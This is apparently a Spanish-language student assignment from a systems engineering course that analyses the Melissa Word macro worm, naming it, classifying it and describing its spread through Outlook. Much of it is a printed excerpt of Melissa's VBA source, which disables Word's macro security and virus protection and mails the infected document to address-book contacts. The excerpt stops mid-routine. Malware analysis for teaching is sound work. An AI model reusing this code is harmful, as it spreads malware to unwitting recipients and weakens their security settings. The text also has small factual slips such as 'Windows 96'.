Está en la página 1de 7

VIROLOGIA I

WIKI EJE 2

Presentado por:

JIMMY QUINTILIAN CARDENAS CHAPARRO

YEISON ORLANDO OJEDA ARDILA

FUNDACIÓN UNIVERSITARIA DEL ÁREANDINA

INGENIERÍA DE SISTEMAS

31 DE AGOSTO DE 2020
INTRODUCCIÓN

En este trabajo analizaremos un tipo de virus informático del cual tenemos el código del
virus, con este lograremos determinar que tipo de virus es, cuales son sus mecanismos de
ataque, como se llama y en que lenguaje de programación ha sido creado. cabe resaltar
que este trabajo es de vital importancia, ya que la mejor manera de generar protocolos de
seguridad robustos debe venir de la mano con el conocimiento de a que nos enfrentamos y
cómo operan las amenazas.
objetivo

a partir de un código, consultar analizar y describir qué tipo de virus se crea con
dicho código.
Estructura del Código Malicioso

Private Sub AutoOpen()


On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <>
""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") =
1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by
Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x=1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x=x+1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show
anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL

¿nombre del virus?

W97M/Melissa.A

S.O En Donde se Ejecuta

Windows (95, Windows 96, Windows Me, Windows 2000, XP)

¿Qué tipo de virus es?

Gusano

¿Qué hace el virus?

Melissa se propaga a través de correo electrónico del siguiente modo:

● Abre el programa de correo Outlook cuando se abre un documento


infectado.
● Captura y utiliza el perfil del usuario infectado, mediante llamadas al
MAPI.
● Crea un mensaje de correo con las siguientes características:

Asunto:
Important Message From "Nombre del remitente"

Texto:
Here is that document you asked for ... don't show anyone else ;-)

Fichero adjunto: un fichero con extensión DOC.

¿Cuál es el lenguaje utilizado?

programación Visual Basic 5.


CONCLUSIÓN

esta estructura de virus se puede definir particularmente por su modo de operación


y fin para el que fue creado, el sistema operativo que es vulnerable a él es windows
en especial las versiones antiguas, a pesar de ello con este codigo raíz del virus se
pueden crear y mejorar para realizar ataques al sistema actual, tanto los virus como
los protocolos de seguridad evolucionan permanentemente y es tarea de ingenieros
y desarrolladores construir sistemas capaces de restringir el paso de estos archivos
maliciosos a los equipos. ahora bien, virus como este se mueven y llegan a ser
efectivos gracias a la ingeniería social, y para mitigar que el usuario final caiga en
ello lo principal son las capacitaciones y la educación tecnológica.

También podría gustarte